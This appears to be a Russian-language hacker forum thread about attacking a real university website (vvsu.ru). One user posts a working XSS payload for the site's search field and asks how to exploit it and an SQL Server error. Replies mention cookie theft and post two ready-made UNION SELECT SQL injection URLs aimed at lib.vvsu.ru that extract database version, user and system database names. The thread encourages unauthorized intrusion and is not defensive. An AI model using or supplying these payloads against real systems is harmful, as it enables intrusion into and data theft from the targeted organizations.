xss уязвимость

Нашел на сайте http://abc.vvsu.ru/ xss-уязвимость,
при вводе
"><script>alert('xss')</script>"<input
в поле "Контекстный поиск:" выводится alert с текстом xss,
что делать дальше пока не представляю, есть идеи?

Так же если в это же поле забить кавычку, то выпадает
[Microsoft][ODBC SQL Server Driver][SQL Server]Íå óäàåòñÿ îòêðûòü áàçó äàííûõ "Logs", çàïðàøèâàåìóþ èìåíåì âõîäà. Íå óäàëîñü âûïîëíèòü âõîä.
Можно ли как-то использовать этот косяк?

 

Я бы помог. Но мало того, что это .ru, это еще и гос сайт. с ' очевидно что скуля. А с хсской куча векторов но все они клиентские. От угона куков до хека тачки

 

Про xss - можно почитать тут

По подову SQL - ошибка вылетает при любом запросе, не обязательно кавычке. Так что это проблемы у них с базой данных.
Вообще про sql можно почитать, например, здесь

 

Code:

http://lib.vvsu.ru/russian/index.php?id=61&id_exhibition=156+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6+--+

но это уже совсем другая история

Code:

http://lib.vvsu.ru//admin/news.asp?idyear=999999.9+union+all+select+null,null,null,(select+char(126)%2bchar(39)%2bname%2bchar(39)%2bchar(126)+from+master..sysdatabases+where+dbid=1),null,null,null,null--

а вот это твоя история

 

Да ВЫ бессмерты, Сударь. Хекать так спокойно гос портал, да ещё и рушный.

 

Отнюдь, милорд, я лишь указал направление, вектор так сказать...